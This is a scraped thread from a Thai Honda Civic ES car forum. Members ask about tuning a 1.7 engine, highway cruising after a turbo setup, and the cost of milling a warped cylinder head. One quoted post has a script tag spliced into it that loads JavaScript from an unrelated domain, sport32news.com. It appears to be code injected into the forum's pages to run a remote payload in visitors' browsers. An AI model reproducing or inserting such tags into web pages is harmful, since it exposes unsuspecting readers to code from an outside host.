แล้วรถพี่ เซ็ทโบมา แช่ที่ความเร็ว 80-120 ทางยาวๆได้เหมือนรถเดิมๆไหมอ่าครับ หรือว่า ลากแช่ไม่ได้เฉพาะความเร็วสูงๆ
ได้รับคำขอบคุณจาก: wishgame 
FuckTong


ชื่อเล่น: เอ๋

เข้าร่วม: 21 เมษา 2011
ตอบ: 4394

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2463
ให้คำขอบคุณ: 2244

ที่อยู่: Samutprakan
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 24 พฤษภาคม 2012 09:31 - ขอถามผู้รู้เกี่ยวกับการเพิ่มความแรงเครื่อง เดิม 1.7
wishgame พิมพ์ว่า:

Ae_Aonnut พิมพ์ว่า:
แอบมาเก็บข้อมูล
ผมแค่ปาดฝามาก็ ok แล้วไม่รู้จาแรงไปไหน<script src="https://sport32news.com/civicesgroup.js"></



ปาดฝาพอจะรู้มั้ยคับว่าต้องเอาค่าเท่าไรยังไง
แล้วราคาประมาณเท่าไรคับ


ผมโดนไป7พันอะครับรวมค่าแรง  ปาดฝา เปลี่ยนพวกก้านวาว อะไรทั้งหลายใหม่หมดเลย+เปลี่ยนประเกนด้วย ที่ต้องทำเพราะฝาโก่งครับ
ได้รับคำขอบคุณจาก: wishgame 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.
Loading...